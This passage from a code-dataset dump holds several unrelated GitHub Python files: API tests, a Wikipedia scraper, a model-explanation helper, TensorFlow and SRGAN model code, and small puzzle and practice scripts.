\"Language object does not contain 'code' field\"\n\n # with allure.step('检查用户邮箱是否已验证'):\n # assert data['data']['me']['private']['emailVerified'] == True, \"Email is not verified\"\n #\n # with allure.step('检查用户语言设置是否为英文'):\n # assert data['data']['me']['private']['language'] == 'en', \"Language is not English\"\n\n @allure.title('test_me_balance')\n @allure.severity(allure.severity_level.CRITICAL)\n def test_me_balance(self, get_config_data, get_viewer1_login_auth_header):\n \"\"\"\n 接口: MeBalance\n\n 用户: viewer1_username \n \"\"\"\n response = common.api_post(get_config_data['url'], get_viewer1_login_auth_header, Payload.test_me_balance())\n print(response)\n\n assert response[\"data\"][\"me\"][\"wallet\"][\"balance\"] is not None\n assert response['data']['me']['id'] == 'user:dlive-degnujtptx', \"Username is incorrect\"\n\n @allure.title('test_me_rebillycards')\n @allure.severity(allure.severity_level.CRITICAL)\n def test_me_rebillyCards(self, get_config_data, get_viewer1_login_auth_header):\n \"\"\"\n 接口: MeRebillyCards\n\n 用户: automation\n \"\"\"\n response = common.api_post(get_config_data['url'], get_viewer1_login_auth_header, Payload.MeRebillyCards())\n print(response)\n assert response[\"data\"][\"me\"][\"id\"] == 'user:dlive-degnujtptx'\n assert response[\"data\"][\"me\"][\"private\"][\"userRebillyCards\"] == []\n\n @allure.title('test_activity_user_donation_rank')\n @allure.severity(allure.severity_level.CRITICAL)\n def test_activity_user_donation_rank(self, get_config_data, api_headers):\n \"\"\"\n 接口: ActivityUserDonationRank\n\n 用户: automation\n \"\"\"\n response = requests.post(get_config_data['url'], headers=api_headers,\n json=Payload.ActivityUserDonationRank())\n assert response.status_code == 200\n data = json.loads(response.text)\n\n assert data[\"data\"][\"userDonationRank\"][\"rank\"] is not None\n assert data[\"data\"][\"userDonationRank\"][\"user\"][\"displayname\"] == 'automation'\n\n @allure.title('test_browse_page_search_category')\n @allure.severity(allure.severity_level.CRITICAL)\n def test_browse_page_search_category(self, get_config_data, api_headers):\n \"\"\"\n 接口: BrowsePageSearchCategory\n\n 用户: automation\n 步骤: category点击show all \n \"\"\"\n response = requests.post(get_config_data['url'], headers=api_headers,\n json=Payload.homepage_browse_page_search_category(\"\"))\n # assert response.status_code == 200 \n data = json.loads(response.text)\n assert data[\"data\"][\"search\"][\"trendingCategories\"][\"list\"] is not None\n\n response_search = requests.post(get_config_data['url'], headers=api_headers,\n json=Payload.homepage_browse_page_search_category(\"qa\"))\n assert response_search.status_code == 200\n data_search = json.loads(response_search.text)\n print(data_search)\n assert data_search[\"data\"][\"search\"][\"trendingCategories\"][\"list\"][1][\"title\"] == \"qaTest\"\n\n @allure.title('test_live_streams_languages')\n @allure.severity(allure.severity_level.CRITICAL)\n def test_live_streams_languages(self, get_config_data, api_headers):\n \"\"\"\n 接口: BrowsePageSearchCategory\n\n 用户: automation\n 步骤: category点击show all \n \"\"\"\n response = requests.post(get_config_data['url'], headers=api_headers,\n json=Payload.live_streams_languages())\n assert response.status_code == 200\n data = json.loads(response.text)\n print (data)\n assert data[\"data\"][\"languages\"][0][\"id\"] is not None\n assert data[\"data\"][\"languages\"][0][\"language\"] == \"All\"\n\n @allure.title('test_homepage_category_live_stream_page')\n @allure.severity(allure.severity_level.CRITICAL)\n def test_homepage_category_live_stream_pages(self, get_config_data, api_headers):\n \"\"\"\n 接口: CategoryLivestreamsPage\n\n 步骤: category点击games \n \"\"\"\n response = common.api_post(get_config_data['url'], api_headers,\n Payload.homepage_category_live_stream_page(get_config_data['streamer_category_id']))\n print(response)\n streamer_list = response[\"data\"][\"livestreams\"][\"list\"]\n with allure.step(\"检查automation这个直播间是否在category: qatest下面\"):\n streamerExist = False\n print(streamer_list)\n for i in streamer_list:\n if get_config_data['follow_streamer'] in i['permlink']:\n streamerExist = True\n if streamerExist:\n with allure.step(\"检查category是否显示正确\"):\n assert i['category']['id'] == \"category:\" + str(get_config_data['streamer_category_id'])\n assert i['title'] == \"Automation test\"\n break\n assert streamerExist == True, 'automation这个直播间不在category: qatest下面'\n\n @allure.title('test_IsUserVerifyEmailButNoPwd')\n @allure.severity(allure.severity_level.CRITICAL)\n def test_IsUserVerifyEmailButNoPwd(self, get_config_data, api_headers): # 轮播检查\n \"\"\"\n 接口: IsUserVerifyEmailButNoPwd\n\n 检查是否验证邮箱接口\n \"\"\"\n response = requests.post(get_config_data['url'], headers=api_headers,\n json=Payload.IsUserVerifyEmailButNoPwd())\n assert response.status_code == 200\n data = json.loads(response.text)\n is_user_verify_email_but_no_pwd = response_json[\"data\"][\"IsUserVerifyEmailButNoPwd\"][\"isUserVerifyEmailButNoPwd\"]\n assert is_user_verify_email_but_no_pwd is False, \"'isUserVerifyEmailButNoPwd' is not False.\"\n\n\n @allure.title('test_isFirstThirdLogin')\n @allure.severity(allure.severity_level.CRITICAL)\n def test_isFirstThirdLogin(self, get_config_data, api_headers): # 轮播检查\n \"\"\"\n 接口: isFirstThirdLogin\n\n 检查是否验证邮箱接口\n \"\"\"\n response = requests.post(get_config_data['url'], headers=api_headers,\n json=Payload.isFirstThirdLogin())\n assert response.status_code == 200\n data = json.loads(response.text)\n is_first_third_login = response_json[\"data\"][\"isFirstThirdLogin\"][\"isFirstThirdLogin\"]\n assert is_first_third_login is False, \"'isFirstThirdLogin' is not False.\"\n\n\n @allure.title('test_LiveCarousel')\n @allure.severity(allure.severity_level.CRITICAL)\n def test_LiveCarousel(self, get_config_data, api_headers): # 轮播检查\n \"\"\"\n 接口: LiveCarousel\n\n 检查是否验证邮箱接口\n \"\"\"\n response = requests.post(get_config_data['url'], headers=api_headers,\n json=Payload.LiveCarousel())\n assert response.status_code == 200\n # 验证 totalCount 字段的值为 5\n total_count = response_json[\"data\"][\"liveCarousel\"][\"totalCount\"]\n assert total_count == 5, \"'totalCount' is not 5.\"\n\n # 验证 list 字段不为空\n carousel_list = response_json[\"data\"][\"liveCarousel\"][\"list\"]\n assert carousel_list, \"'list' is empty.\"\n\n # 验证 list 中每一项不为空\n for item in carousel_list:\n assert item, \"An item in 'list' is empty.\"\n\nif __name__ == '__main__':\n print('e2rwf')\n print(os.getcwd())\n pytest.main(['./test_homepage.py', '--alluredir', './report/results-20230627-1'])\n os.system('allure generate ./report/results-20230627-1 -o ./report/report-20230627-1 --clean')\n","repo_name":"lino-network/web-api-test","sub_path":"tests/api/test_homepage.py","file_name":"test_homepage.py","file_ext":"py","file_size_in_byte":16289,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"70712088421","text":"from __future__ import annotations\n\nimport unicodedata\nfrom typing import Iterator\n\nimport arrow\nimport trio\nfrom selectolax.parser import HTMLParser, Node\n\nimport scrapewiki\n\nfrom .abc.coroutine_handler import CoroutineHandler\nfrom .constants import NOT_FOUND_TEXT\nfrom .structures import (\n Category,\n Content,\n ExternalLink,\n Header,\n HeaderListItem,\n HTMLHeaderTags,\n Note,\n Page,\n Paragraph,\n Reference,\n References,\n)\n\n__all__ = [\"Wiki\", \"PageParser\"]\n\n\nclass Wiki(CoroutineHandler):\n def __init__(self, scrapewiki: scrapewiki.Scrapewiki, page_name: str, **kwargs):\n super().__init__(page_name, **kwargs)\n self.scrapewiki = scrapewiki\n self.page_name = page_name\n self.kwargs = kwargs\n\n @property\n def page_url(self):\n url = self.scrapewiki.http.BASE_URL / \"wiki\" / self.page_name\n return str(url)\n\n def sync_method(self) -> scrapewiki.structures.Page:\n with self.scrapewiki.http.get(self.page_url, follow_redirects=True) as response:\n return PageParser(self.scrapewiki, response.text, self.page_url).parse()\n\n async def async_method(self) -> scrapewiki.structures.Page:\n async with self.scrapewiki.http.get(\n self.page_url, follow_redirects=True\n ) as response:\n parser = PageParser(self.scrapewiki, response.text, self.page_url)\n return await trio.to_thread.run_sync(parser.parse)\n\n def __enter__(self) -> scrapewiki.structures.Page:\n return super().__enter__()\n\n async def __aenter__(self) -> scrapewiki.structures.Page:\n return await super().__aenter__()\n\n\nclass PageParser:\n def __init__(self, scrapewiki: scrapewiki.Scrapewiki, html: str, page_url: str):\n self.scrapewiki = scrapewiki\n self.html = html\n self.page_url = page_url\n self.parser = HTMLParser(html)\n self.header_names = [x.name for x in HTMLHeaderTags]\n\n def parse_notes(self, notes: list[Node]) -> Iterator[Note]:\n \"\"\"Parse the notes from a list of nodes.\"\"\"\n\n for note in notes:\n text = str()\n refs = list()\n\n for child in note.iter(include_text=True):\n if child.tag == \"-text\":\n text += str(child.raw_value, \"utf-8\")\n elif child.tag == \"a\":\n refs.append(\n Reference(child.text(), self.parse_url(child.attrs[\"href\"]))\n )\n text += child.text()\n elif child.tag != \"sup\":\n text += child.text()\n\n yield Note(text, refs)\n\n def parse_categories(self, nodes: list[Node]) -> Iterator[Category]:\n \"\"\"Parse the categories from a list of nodes.\"\"\"\n\n for node in nodes:\n yield Category(\n node.css_first(\"a\").text(),\n self.parse_url(node.css_first(\"a\").attrs[\"href\"]),\n )\n\n def parse_external_links(self, nodes: Iterator[Node]) -> Iterator[ExternalLink]:\n \"\"\"Parse the external links from a list of nodes.\"\"\"\n\n for node in nodes:\n if node.tag == \"h2\" and node.text(strip=True) == \"External links\":\n break\n\n for node in nodes:\n if node.tag == \"ul\":\n for a in node.css(\"a.external\"):\n yield ExternalLink(\n a.text(),\n a.attrs[\"href\"],\n )\n\n def parse_references(self, nodes: Iterator[Node]) -> Iterator[References]:\n \"\"\"Parse the references from a list of nodes.\"\"\"\n\n for node in nodes:\n if node.tag == \"h2\" and node.text(strip=True) == \"References\":\n break\n\n for node in nodes:\n if node.tag == \"ol\":\n for li in node.css(\"li\"):\n text_node = li.css_first(\"span.reference-text\")\n cite = text_node.css_first(\"cite\")\n if cite:\n cite.unwrap()\n\n references = []\n\n if text_node:\n text = self.get_paragraph(text_node).text\n for a in text_node.css(\"a\"):\n a_t = a.attributes.get(\"title\")\n a_c = a.attributes.get(\"class\")\n if a_t:\n references.append(\n Reference(a_t, self.parse_url(a.attributes[\"href\"]))\n )\n elif a_c == \"external text\":\n references.append(\n Reference(a.text(), a.attributes[\"href\"])\n )\n yield References(text, references)\n\n def get_paragraph(self, node: Node) -> Paragraph:\n \"\"\"Get a paragraph from a node.\"\"\"\n\n text = str()\n refs = list()\n\n for child in node.iter(include_text=True):\n if child.tag == \"-text\":\n data = str(child.raw_value, \"utf-8\")\n text += unicodedata.normalize(\"NFD\", data).replace(\" \", \" \")\n elif child.tag == \"a\" and \"external\" not in child.attributes.get(\n \"class\", \"\"\n ):\n refs.append(\n Reference(child.text(), self.parse_url(child.attrs[\"href\"]))\n )\n text += child.text()\n elif child.tag not in (\"sup\", \"style\"):\n text += child.text()\n\n text = text.strip()\n if text or refs:\n return Paragraph(text, refs)\n\n def parse_contents(self, toc: Node) -> list[Content]:\n \"\"\"Parse the contents of the table of contents.\"\"\"\n\n contents = list()\n\n for node in toc.iter():\n if node.tag == \"li\":\n name = node.css_first(\"a\").attributes[\"href\"][1:]\n url = str(\n (self.scrapewiki.http.BASE_URL / \"wiki\" / self.title).with_fragment(\n node.css_first(\"a\").attrs[\"href\"][1:]\n )\n )\n ul = node.css_first(\"ul\")\n sub_contents = self.parse_contents(ul) if ul else None\n\n contents.append(Content(name, url, sub_contents))\n\n return contents\n\n def parse_ul(self, node: Node) -> list[HeaderListItem]:\n \"\"\"Parse the contents of a unordered list.\"\"\"\n\n contents = list()\n\n for child in node.iter():\n if child.tag == \"li\":\n name = child.text()\n url = child.css_first(\"a\")\n if url:\n if \"wiki/\" in url.attributes[\"href\"]:\n url = self.parse_url(url.attributes[\"href\"])\n else:\n url = url.attributes[\"href\"]\n\n ul = child.css_first(\"ul\")\n sub_lists = self.parse_ul(ul) if ul else None\n\n contents.append(HeaderListItem(name, url, sub_lists))\n\n return contents\n\n def parse_url(self, url: str) -> str:\n \"\"\"Parses a URL from a relative path.\"\"\"\n\n return str(self.scrapewiki.http.BASE_URL / url[1:])\n\n def parse_headers(self, nodes: list[Node], headers=[]) -> list[Header]:\n \"\"\"Parse headers from the given nodes.\"\"\"\n\n if not nodes:\n return headers\n\n for node in nodes.copy():\n if node.tag.upper() in self.header_names:\n header = node\n\n try:\n title = header.css_first(\"span.mw-headline\").text(strip=True)\n except AttributeError:\n title = header.text(strip=True)\n\n paras = []\n notes = []\n references = []\n lists = None\n nodes.pop(0)\n\n for node in nodes.copy():\n if node.tag == \"p\":\n paras.append(self.get_paragraph(node))\n nodes.pop(0)\n\n elif node.attributes.get(\"role\") == \"note\":\n notes.append(node)\n nodes.pop(0)\n\n elif node.tag == \"ul\" and title != \"References\":\n lists = self.parse_ul(node)\n\n elif node.tag.upper() in self.header_names:\n headers.append(\n Header(\n title,\n HTMLHeaderTags[header.tag.upper()].value,\n list(self.parse_notes(notes)),\n paras or None,\n references or None,\n lists,\n )\n )\n return self.parse_headers(nodes, headers)\n\n return headers\n else:\n nodes.pop(0)\n\n def parse(self) -> Page:\n \"\"\"Parse the page and return a Page object.\"\"\"\n\n content = self.parser.css_first(\"#content\")\n self.title = content.css_first(\"#firstHeading\").text()\n\n for b in self.parser.css(\"div + b\"):\n if b.text(strip=True) == NOT_FOUND_TEXT:\n raise scrapewiki.PageNotFound(self.title) from None\n\n last_modified = (\n self.parser.css_first(\"#footer-info-lastmod\")\n .text()[30:-7]\n .replace(\", at\", \"\")\n )\n try:\n last_modified = arrow.get(last_modified, \"DD MMMM YYYY HH:mm\")\n except arrow.parser.ParserMatchError:\n last_modified = arrow.get(last_modified, \"D MMMM YYYY HH:mm\")\n\n content.css_first(\"#bodyContent\").unwrap()\n content.css_first(\"#mw-content-text\").unwrap()\n content.css_first(\".mw-parser-output\").unwrap()\n reflist = content.css_first(\"div.reflist\")\n\n categories = list(self.parse_categories(content.css(\"#catlinks li a\")))\n external_links = list(self.parse_external_links(content.iter()))\n contents = content.css_first(\".toc ul\") or None\n\n if contents:\n contents = self.parse_contents(contents)\n\n if reflist:\n reflist.unwrap()\n references = list(self.parse_references(content.iter()))\n else:\n references = None\n\n headers = self.parse_headers(list(content.iter()))\n return Page(\n categories,\n self.title,\n self.page_url,\n last_modified.datetime,\n headers or None,\n contents,\n external_links or None,\n references,\n )\n","repo_name":"eeriemyxi/scrapewiki","sub_path":"scrapewiki/wiki.py","file_name":"wiki.py","file_ext":"py","file_size_in_byte":10678,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"27669480684","text":"\"\"\"A class that stores dataset specific descriptions specified for that dataset.\n\nThese descriptions are called in different ways when generating responses in the conversation to\nprovide more tailored dataset specified feedback\n\"\"\"\nimport gin\nfrom typing import Any\n\nfrom sklearn.metrics import accuracy_score, confusion_matrix, roc_auc_score, f1_score, precision_score, recall_score\n\nfrom explain.utils import read_and_format_data\n\n\n@gin.configurable\nclass DatasetDescription:\n \"\"\"The dataset description class.\"\"\"\n\n def __init__(self,\n dataset_objective: str = \"\",\n dataset_description: str = \"\",\n model_description: str = \"\",\n eval_file_path: str = None,\n index_col: int = 0,\n target_var_name: str = \"y\"):\n \"\"\"Init.\n\n Arguments:\n dataset_objective: The goal of the dataset. I.e., \"predict whether someone has a\n disease\" or \"predict whether this image is a dog\".\n dataset_description: A brief description of the dataset, i.e., \"disease prediction\" or\n \"canine classification\".\n eval_file_path: The filepath to an eval dataset that will be used to compute a test\n score for the model on the training dataset to summarize performance.\n index_col: The index columns of the testing data\n target_var_name: The target variable name in the testing data\n model_description: A description of the model. i.e., gradient boosted tree or linear\n regression\n \"\"\"\n self.objective = dataset_objective\n self.description = dataset_description\n self.eval_file_path = eval_file_path\n self.index_col = index_col\n self.target_var_name = target_var_name\n self.model_description = model_description\n\n def get_dataset_objective(self):\n \"\"\"Gets the objective.\"\"\"\n return self.objective\n\n def get_dataset_description(self):\n \"\"\"Gets the description.\"\"\"\n return self.description\n\n def get_model_description(self):\n \"\"\"Gets the model description.\"\"\"\n return self.model_description\n\n def get_text_description(self):\n \"\"\"Returns a brief text overview of the dataset and model.\"\"\"\n text = (f\"This chat interfaces to a model trained on a {self.get_dataset_description()}\"\n f\" dataset. The goal of the model is to {self.get_dataset_objective()}.\")\n return text\n\n @staticmethod\n def get_score_text(y_true: Any,\n y_pred: Any,\n metric_name: str,\n rounding_precision: int,\n data_name: str) -> str:\n \"\"\"Computes model score and returns text describing the outcome.\n\n Arguments:\n data_name: The name of the data split, e.g. testing data\n y_true: The true y values\n y_pred: The predicted y values\n metric_name: The name of the metric\n rounding_precision: The sig figs to round to\n Returns:\n performance_summary: A string describing the performance\n \"\"\"\n if metric_name == \"accuracy\":\n score = accuracy_score(y_true, y_pred)\n # sklearn defaults to accuracy represented as decimal. convert this to %\n score *= 100\n elif metric_name == \"roc\":\n score = roc_auc_score(y_true, y_pred)\n elif metric_name == \"f1\":\n score = f1_score(y_true, y_pred)\n elif metric_name == \"recall\":\n score = recall_score(y_true, y_pred)\n elif metric_name == \"precision\":\n score = precision_score(y_true, y_pred)\n elif metric_name == \"sensitivity\":\n tn, fp, fn, tp = confusion_matrix(y_true, y_pred).ravel()\n score = tp / (tp + fn)\n elif metric_name == \"specificity\":\n tn, fp, fn, tp = confusion_matrix(y_true, y_pred).ravel()\n score = tn / (tn + fp)\n elif metric_name == \"ppv\":\n tn, fp, fn, tp = confusion_matrix(y_true, y_pred).ravel()\n score = tp / (tp + fp)\n elif metric_name == \"npv\":\n tn, fp, fn, tp = confusion_matrix(y_true, y_pred).ravel()\n score = tn / (tn + fn)\n else:\n raise NameError(f\"Unknown metric {metric_name}\")\n\n string_score = str(round(score, rounding_precision))\n\n # additional context for accuracy score\n if metric_name == \"accuracy\":\n string_score += \"%\"\n\n performance_summary = f\"The model scores {string_score} {metric_name} on \"\n performance_summary += f\"{data_name}.\"\n return performance_summary\n\n def get_eval_performance(self,\n model: Any,\n metric_name: str = \"accuracy\",\n rounding_precision: int = 3) -> str:\n \"\"\"Computes the eval performance.\n\n Arguments:\n model: The model\n metric_name: The name of the metric used, e.g., accuracy. The currently supported\n metrics are accuracy, roc, f1, recall, and precision.\n rounding_precision: The number of decimal places to present in the result\n Returns:\n performance_summary: A string describing the performance summary of the model.\n \"\"\"\n\n # If no eval dataset is specified, ignore providing\n # performance summary\n if self.eval_file_path is None:\n return \"\"\n\n # Loads and processes the testing dataset\n x_values, y_values, _, _ = read_and_format_data(self.eval_file_path,\n index_col=self.index_col,\n target_var_name=self.target_var_name,\n cat_features=None,\n num_features=None)\n\n # read_and_format_data returns pandas.df, so convert to numpy for model inference\n x_values = x_values.values\n y_pred = model.predict(x_values)\n # Get performance summary\n performance_summary = self.get_score_text(y_values,\n y_pred,\n metric_name,\n rounding_precision,\n \"the data\")\n return performance_summary\n","repo_name":"dylan-slack/TalkToModel","sub_path":"explain/dataset_description.py","file_name":"dataset_description.py","file_ext":"py","file_size_in_byte":6622,"program_lang":"python","lang":"en","doc_type":"code","stars":92,"dataset":"github-code","pt":"35"} +{"seq_id":"11523441515","text":"##############################################\n#\n# Chris Snyder\n# lok139\n# vegas_regression.py\n#\n#############################################\n\nimport tensorflow as tf\nimport numpy as np\nimport os\nimport pandas as pd\nfrom tqdm import tqdm\n\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'\n\nlearning_rate = 0.1\ntraining_epochs = 200\n\n#Run the regressor\ndef run(df):\n #clean the data\n #df.to_csv(\"testdata.csv\")\n train_x_l = []\n for col in df:\n if col != 'Score':\n train_x_l.append(df[col])\n train_y = df['Score']\n #####################################################stay###################type\n test_x = [[0,1],[1,1],[0,0],[0,1],[1,1],[1,1],[3,5],[0,1],[0,0],[0,0],[1,0],[0,0],[0,0],[1,0],[0,0],[0,1]]\n test_y = [4]\n n_samples = 504\n\n #initialize placeholders\n X_in_list = []\n for x in train_x_l:\n X_in_list.append(tf.placeholder(tf.float32)) \n Y = tf.placeholder(tf.float32, name = 'p_y')\n\n #Initilaize weights and biases\n W_list = []\n for x in train_x_l:\n W_list.append(tf.Variable(np.random.randn()))\n b = tf.Variable(np.random.randn())\n\n #dot product\n sum_list = []\n for (x, w) in zip(X_in_list, W_list):\n sum_list.append(tf.multiply(x, w))\n\n # initialize prediction, cost and optimization procedures\n pred = tf.add_n(sum_list) + b\n cost = tf.reduce_mean(tf.pow(Y - pred, 2))/(2*n_samples)\n optimizer = tf.train.GradientDescentOptimizer(learning_rate).minimize(cost)\n\n init = tf.global_variables_initializer()\n\n #Begin the session\n with tf.Session() as sess:\n sess.run(init)\n #Begin learning\n print(\"Learning...\")\n train_with_y = train_x_l\n train_with_y.append(train_y)\n X_with_Y = X_in_list\n X_with_Y.append(Y)\n trainlist = list(zip(*train_with_y))\n for epoch in tqdm(range(training_epochs)):\n for xlist in trainlist:\n feeddict = buildDict(X_in_list, xlist)\n sess.run(optimizer, feed_dict=feeddict)\n\n #Begin testing\n print(\"Testing...\")\n \n test_xy = test_x\n test_xy.append(test_y)\n feeddict = buildDict(X_in_list, test_xy)\n #final_cost = sess.run(cost, feed_dict = feeddict)\n feedict = buildDict(X_in_list, test_x)\n pred_values = sess.run(pred, feed_dict = feeddict)\n for i, value in enumerate(pred_values):\n print(\"Question #\" + str(i+1) + \" = \" + str(round(value, 1)))\n\n#Build a dictionary to feed\ndef buildDict(X_in_list, train_x):\n newDict = dict(zip(X_in_list, train_x))\n return newDict\n","repo_name":"chrisMsnyder/Projects","sub_path":"Vegas Predictor/vegas_regression.py","file_name":"vegas_regression.py","file_ext":"py","file_size_in_byte":2600,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"71673770980","text":"import math\n\nimport torch\nimport torch.nn as nn\nfrom torch.hub import load_state_dict_from_url\n\nfrom .utils import ResidualBlock\nfrom .utils import SubpixelConvolutionLayer\n\nmodel_urls = {\n \"srgan_2x2\": \"https://github.com/Lornatang/SRGAN-PyTorch/releases/download/v0.2.2/SRGAN_2x2_ImageNet2012-3f1d605edcbfb83dc836668731cd6135b00ff62ea6f8633559fbb5dffe8413ba.pth\",\n \"srgan\": \"https://github.com/Lornatang/SRGAN-PyTorch/releases/download/v0.2.2/SRGAN_ImageNet2012-158a3f9e70f45aef607e4146e29cde745e8d9a35972cb067f1ee00cb92254e02.pth\",\n \"srgan_8x8\": \"https://github.com/Lornatang/SRGAN-PyTorch/releases/download/v0.2.2/SRGAN_8x8_ImageNet2012-c8207fead3ec73cdf6772fb60fef759833bae4a535eb8d3287aba470696219c1.pth\"\n}\n\n\nclass Generator(nn.Module):\n def __init__(self, upscale_factor: int = 4) -> None:\n r\"\"\"\n Args:\n upscale_factor (int): How many times to upscale the picture. (Default: 4)\n \"\"\"\n super(Generator, self).__init__()\n # Calculating the number of subpixel convolution layers.\n num_subpixel_convolution_layers = int(math.log(upscale_factor, 2))\n\n # First layer.\n self.conv1 = nn.Sequential(\n nn.Conv2d(3, 64, kernel_size=9, stride=1, padding=4),\n nn.PReLU()\n )\n\n # 16 Residual blocks.\n trunk = []\n for _ in range(16):\n trunk.append(ResidualBlock(channels=64))\n self.trunk = nn.Sequential(*trunk)\n\n # Second conv layer post residual blocks.\n self.conv2 = nn.Sequential(\n nn.Conv2d(64, 64, kernel_size=3, stride=1, padding=1, bias=False),\n nn.BatchNorm2d(64)\n )\n\n # 2 Sub-pixel convolution layers.\n subpixel_conv_layers = []\n for _ in range(num_subpixel_convolution_layers):\n subpixel_conv_layers.append(SubpixelConvolutionLayer(64))\n self.subpixel_conv = nn.Sequential(*subpixel_conv_layers)\n\n # Final output layer.\n self.conv3 = nn.Conv2d(64, 3, kernel_size=9, stride=1, padding=4)\n\n def forward(self, x: torch.Tensor) -> torch.Tensor:\n conv1 = self.conv1(x)\n trunk = self.trunk(conv1)\n conv2 = self.conv2(trunk)\n out = torch.add(conv1, conv2)\n out = self.subpixel_conv(out)\n out = self.conv3(out)\n\n return out\n\n\ndef _gan(arch: str, upscale_factor: int, pretrained: bool, progress: bool) -> Generator:\n model = Generator(upscale_factor)\n if pretrained:\n state_dict = load_state_dict_from_url(model_urls[arch], progress=progress, map_location=torch.device(\"cpu\"))\n model.load_state_dict(state_dict)\n return model\n\n\ndef srgan_2x2(pretrained: bool = False, progress: bool = True) -> Generator:\n r\"\"\"GAN model architecture from the `\"One weird trick...\" ` paper.\n\n Args:\n pretrained (bool): If True, returns a model pre-trained on ImageNet\n progress (bool): If True, displays a progress bar of the download to stderr\n \"\"\"\n return _gan(\"srgan_2x2\", 2, pretrained, progress)\n\n\ndef srgan(pretrained: bool = False, progress: bool = True) -> Generator:\n r\"\"\"GAN model architecture from the `\"One weird trick...\" ` paper.\n\n Args:\n pretrained (bool): If True, returns a model pre-trained on ImageNet\n progress (bool): If True, displays a progress bar of the download to stderr\n \"\"\"\n return _gan(\"srgan\", 4, pretrained, progress)\n\n\ndef srgan_8x8(pretrained: bool = False, progress: bool = True) -> Generator:\n r\"\"\"GAN model architecture from the `\"One weird trick...\" ` paper.\n\n Args:\n pretrained (bool): If True, returns a model pre-trained on ImageNet\n progress (bool): If True, displays a progress bar of the download to stderr\n \"\"\"\n return _gan(\"srgan_8x8\", 8, pretrained, progress)\n","repo_name":"anneouyang/noisy-superres","sub_path":"SRGAN-PyTorch/srgan_pytorch/models/generator.py","file_name":"generator.py","file_ext":"py","file_size_in_byte":3879,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"35"} +{"seq_id":"74605329701","text":"\"\"\"AoC 2015.10 problem solver.\n\nTakes input from STDIN by default.\n\n(c) Alexander Kashev, 2017\n\"\"\"\nimport sys\n\n\ndef look_and_say(string):\n \"\"\"\n Expand a string of digits according to look-and-say process in the problem.\n\n Keyword arguments:\n string --- a string to be processed\n \"\"\"\n result = \"\"\n last = \"\"\n count = 0\n\n for digit in string:\n if digit != last:\n if(count):\n result += str(count) + last\n last = digit\n count = 1\n else:\n count += 1\n\n if(count):\n result += str(count) + last\n\n return result\n\n\ndef solver(file, progress=True):\n \"\"\"\n Take a file object with input and solve AoC 2015.10 problem on the input.\n\n Outputs progress to STDERR unless silenced.\n\n Keyword arguments:\n file --- a file object to read input from\n progress --- boolean, whether to output progress to STDERR\n \"\"\"\n seed = file.readline()\n result = seed\n\n for i in range(0, 50):\n result = look_and_say(result)\n if i == 39:\n result40 = result\n if progress:\n sys.stderr.write(\"\\rProcessed {}/{} steps..\".format(i + 1, 50))\n\n if progress:\n sys.stderr.write(\"\\n\")\n\n return (len(result40), len(result))\n\n\nif __name__ == \"__main__\":\n solution = solver(sys.stdin)\n\n print(\"Part A: Length after 40 steps is {}.\".format(solution[0]))\n print(\"Part B: Length after 50 steps is {}.\".format(solution[1]))\n","repo_name":"kav2k/AoC","sub_path":"2015/10/solver.py","file_name":"solver.py","file_ext":"py","file_size_in_byte":1370,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"19807562940","text":"import heapq\nclass Solution(object):\n\n def arr_max(self, arr):\n mi = float(\"inf\")\n min_ind = 0\n for i in range(len(arr)):\n if arr[i] < mi:\n mi = arr[i]\n min_ind = i\n return mi, min_ind\n\n def arr_min(self, arr):\n mi = float(\"inf\")\n min_ind = 0\n for i in range(len(arr)):\n if arr[i] < mi:\n mi = arr[i]\n min_ind = i\n return mi, min_ind\n\n def minAmp(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: int\n \"\"\"\n #[0,1,1,4,6,6,6]\n if len(nums) < 4:\n return 0\n nums.sort()\n\n res_1 = min(nums[-1]-nums[3],nums[-4]-nums[0]);\n res_2 = min(nums[-2]-nums[2],nums[-3]-nums[1]);\n\n\n return min(res_1, res_2)\n\n\nif __name__ == \"__main__\":\n sol = Solution()\n\n testcases = [[-1,3,-1,8,5,4], [10,10,3,4,10]]\n for i, test in enumerate(testcases):\n print(\"Testcase \" + str(i) + \" is: \" + str(sol.minAmp(test)))\n","repo_name":"JoshuaSamuelTheCoder/Quarantine","sub_path":"Min_Amplitude/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1032,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"38398255045","text":"x = 1\nwhile x <= 5:\n print(x * x)\n x = x + 1\n\n\n\nfor p in range(1,6):\n print(p * p)\n\n\nimport random\ngame_won = False\nran = random.randint(1,100)\n\nwhile not game_won:\n choose = int(raw_input(\"GIMME URE NUMBER FOOL!!!!! \"))\n if choose == ran:\n print (\"well done FOOL u actually know what a number is! \")\n game_won = True\n elif choose > ran:\n print (\"thats bigger than my number DUMB DUMB! \")\n elif choose < ran:\n print (\"thats less han my number you UTTER COMPLETE IDIOT!! \")\n \nprint (\"the end!\")\n\n \n\n \n \n\n","repo_name":"martinpeck/random-pi","sub_path":"matt/loops.py","file_name":"loops.py","file_ext":"py","file_size_in_byte":568,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"12677615690","text":"import io\nimport sys\n\nsys.stdout = io.TextIOWrapper(sys.stdout.buffer,encoding='utf-8')\nsys.stdin = io.TextIOWrapper(sys.stdin.buffer,encoding='utf-8')\n\n\ndef num(s):\n l = ['零', '壹', '贰', '叁', '肆', '伍', '陆', '柒', '捌', '玖']\n l_3 = ['', '拾', '佰', '仟', '万', '拾', '佰', '仟', '亿', '拾', '佰', '仟', '万']\n s = list(map(int, list(s)))[::-1]\n l_2 = []\n\n for i in s:\n l_2.insert(0, l_3[0])\n l_2.insert(0, l[i])\n l_3.remove(l_3[0])\n return l_2\n\n\ndef zero(l):\n l_2 = ['拾', '佰', '仟', '万', '亿']\n l_3 = []\n for i in range(len(l)-1, 0, -1):\n if l[i] in l_2 and l[i-1] == '零' and l[i] != '亿':\n del l[i]\n\n w = ''\n for c in l:\n if c != '零':\n 